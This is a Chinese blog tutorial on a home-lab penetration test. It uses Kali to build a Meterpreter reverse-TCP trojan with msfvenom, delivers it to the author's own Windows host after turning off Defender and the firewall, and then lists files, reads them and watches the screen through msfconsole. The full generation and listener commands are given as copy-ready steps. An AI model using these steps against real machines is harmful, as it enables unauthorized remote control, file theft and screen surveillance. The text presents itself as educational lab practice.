国外做评论的网站,长链接缩短在线生成,谷歌云 wordpress 建站,空投糖果网站开发本次渗透测试将使用kali虚拟机#xff08;攻击机#xff09;对本机#xff08;靶机#xff09;进行入侵并监控屏幕 声明#xff1a;本篇仅仅是将本机作为靶机的一次简易渗透测试#xff0c;实际情况中基本不可能出现如此简单的木马骇入#xff08;往往在上传木马时就被防… 本次渗透测试将使用kali虚拟机攻击机对本机靶机进行入侵并监控屏幕 声明本篇仅仅是将本机作为靶机的一次简易渗透测试实际情况中基本不可能出现如此简单的木马骇入往往在上传木马时就被防护功能进行查杀了况且——任何骇入他人设备的操作都是违法行为因此仅用作经验分享供学习。 一确认相关设置
①VMware菜单栏中选择【虚拟机(M)】-【设置(S)】-在网络适配器中确认开启NAT模式 ②控制面板中选择【查看网络状态和任务】-【更改设配器设置】
-找到VMnet8网卡右键【属性】-在属性栏中找到【VMware Bridge Protocol】打开桥接模式使主机和虚拟机能够互连 ③按如下步骤关闭【病毒和威胁防护】与【防火墙和网络保护】这一步是为了保证待会儿我们上传给本机靶机的“小木马”不会被这些强力防护阻拦与清除 进行此步操作请确保本机没有被入侵的风险笔者写本篇的目的仅为提供经验 如若出现任何损失概不负责 二创建木马与上传木马
①打开kali虚拟机打开终端输入命令【ifconfig】注意是if不是ip查看虚拟机攻击机的ip地址 ②输入以下命令生成木马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.xx.xxx LPORT9999 -f exe test.exe 注———— 蓝色部分是上一步查看到的虚拟机攻击机的ip地址请自行查询并修改 紫色部分是用于监听本机靶机的端口任意选择一个不被占用的端口即可 绿色部分是本次生成的木马文件的名字任意设置 代码块用于快速复制命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.xx.xxx LPORT9999 -f exe test.exe出现如下回显说明成功且在执行命令的工作目录下生成文件这里我是在桌面目录即【~/Desktop】执行的命令因此文件直接生成在了桌面上读者可自行选择目录执行命令 ③上传木马到本机靶机上直接采用最直接的拖动法完成上传... 进行这一步时请确保标题一中相关设置的第③步否则木马文件会被阻拦或清除 三执行命令以监听本机靶机
①在kali终端中依次输入以下命令 msfconsole use exploit/multi/handler windows/meterpreter/reverse_tcp set lhost 192.168.xx.xxx set lport 9999 exploit 注———— 蓝色部分是虚拟机攻击机的ip地址请自行查询并修改 紫色部分是用于监听本机靶机的端口需要确保和标题二中创建木马时输入的端口相同 代码块用于快速复制命令 msfconsole use exploit/multi/handler windows/meterpreter/reverse_tcp set lhost 192.168.xx.xxx set lport 9999 exploit ②本机靶机运行木马文件“上钩”
在上一步中执行完命令【exploit】后kali将进入连接状态kali终端显示如下 此时在本机中运行木马文件即可运行后kali将成功完成渗透并进入【meterpreter】状态 四测试
①基础浏览
渗透成功后虚拟机攻击机可以实时监控本机靶机可以使用Linux基本命令如【ls】列出本机靶机当前目录的文件和文件夹【cat】命令查看本机靶机的文件具体内容...等等请读者自行摸索测试可以使用命令【help】获取命令菜单
②实时监控
使用命令【run vnc】将在虚拟机攻击机中生成窗口实时监控本机靶机
③退出连接
使用快捷键【Ctrl Z】将退出对当前靶机的连接询问是否退出输入【y】如下 ④查看已连接设备即“上钩”靶机
退出连接状态后使用命令【sessions】可以列出所有“上钩”靶机使用命令【sessions -i Id】可以连接指定id的靶机如sessions -i 1将连接Id为1的靶机 尾声
完成测试后记得及时开启【病毒和威胁防护】与【防火墙和网络保护】防止本机受到病毒或骇客攻击具体操作见【标题一的第③步】 本篇技术仅用作经验分享请勿用于任何非法行为 任何入侵他人设备的操作都是违法行为